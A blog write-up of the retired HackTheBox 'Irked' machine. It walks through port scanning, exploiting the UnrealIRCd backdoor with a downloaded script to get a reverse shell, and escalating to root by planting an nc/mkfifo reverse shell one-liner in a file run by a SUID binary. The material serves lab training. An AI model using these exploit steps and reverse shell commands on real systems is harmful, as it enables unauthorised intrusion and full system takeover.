yuasa's blog

[HackTheBox] Irked Writeup

Posted on May 20, 2022

I worked on the Irked retired machine of HackTheBox, so I will write its writeup.

label

Port Scan

kali@kali:~$ nmap -T4 -A -v -Pn -p- 10.10.10.117
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          44470/udp6  status
|   100024  1          47934/tcp   status
|   100024  1          49257/udp   status
|_  100024  1          56691/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
47934/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 6679

Use nmap script to find out if Unreal IRCd is vulnerable. You can see that it is actually a vulnerable version.

kali@kali:~$ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-18 00:58 EDT
Nmap scan report for irked.htb (10.10.10.117)
Host is up (0.25s latency).
Not shown: 341 closed ports
PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.64 seconds

Use this exploit to do a reverse shell.

kali@kali:~$ wget https://raw.githubusercontent.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/master/exploit.py
--2022-05-18 01:04:52--  https://raw.githubusercontent.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2195 (2.1K) [text/plain]
Saving to: ‘exploit.py’

exploit.py                                  100%[==========================================================================================>]   2.14K  --.-KB/s    in 0s      

2022-05-18 01:04:52 (19.2 MB/s) - ‘exploit.py’ saved [2195/2195]

Modify the IP and port part of the attacker.

# Sets the local ip and port (address and port to listen on)
local_ip = '10.10.14.5'  # CHANGE THIS
local_port = '4444'  # CHANGE THIS

Execute script.

kali@kali:~$ python3 exploit.py -payload bash 10.10.10.117 6697
Exploit sent successfully!

kali@kali:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.117] 47434
bash: cannot set terminal process group (650): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

Privilege Escalation ircd -> root

When doing the enumeration for privilege escalation, I notice that there are some unfamiliar SUID file /usr/bin/viewuser.

ircd@irked:~/Unreal3.2$ find / -type f -a \( -perm -u+s \) -exec ls -l {} \; 2> /dev/null
<d / -type f -a \( -perm -u+s \) -exec ls -l {} \; 2> /dev/null              
-rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29  2015 /bin/umount

If you run it, you’ll see that this script runs /usr/bin/viewuser.

ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2022-05-19 08:59 (:0)
djmardov pts/0        2022-05-20 03:12 (10.10.14.6)
sh: 1: /tmp/listusers: not found
This application is being devleoped to set and test user permissions
It is still being actively developed

Make sure this script runs with root privileges.

ircd@irked:~/Unreal3.2$ echo "id" > /tmp/listusers
echo "id" > /tmp/listusers

ircd@irked:~/Unreal3.2$ chmod +x  /tmp/listusers
chmod +x  /tmp/listusers

ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2022-05-19 08:59 (:0)
djmardov pts/0        2022-05-20 03:12 (10.10.14.6)
uid=0(root) gid=1001(ircd) groups=1001(ircd)
This application is being devleoped to set and test user permissions
It is still being actively developed

Do a reverse shell and get a shell with root privileges.

ircd@irked:~/Unreal3.2$ echo 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 4242 >/tmp/f' > /tmp/listusers
<p/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 4242 >/tmp/f' > /tmp/listusers 
ircd@irked:~/Unreal3.2$ /usr/bin/viewuser
/usr/bin/viewuser
(unknown) :0           2022-05-19 08:59 (:0)

Get the user flag and the root flag.

kali@kali:~$ nc -nlvp 4242
listening on [any] 4242 ...                                                                                                                                                    
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.117] 53024                                                                                                                    
# id                                                                                                                                                                           
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)         
# cat /home/djmardov/Documents/user.txt
*************************
# cat /root/root.txt
*************************

Thoughts

It took me a while to notice the existence of /usr/bin/viewuser, but it was a simple and wonderful machine.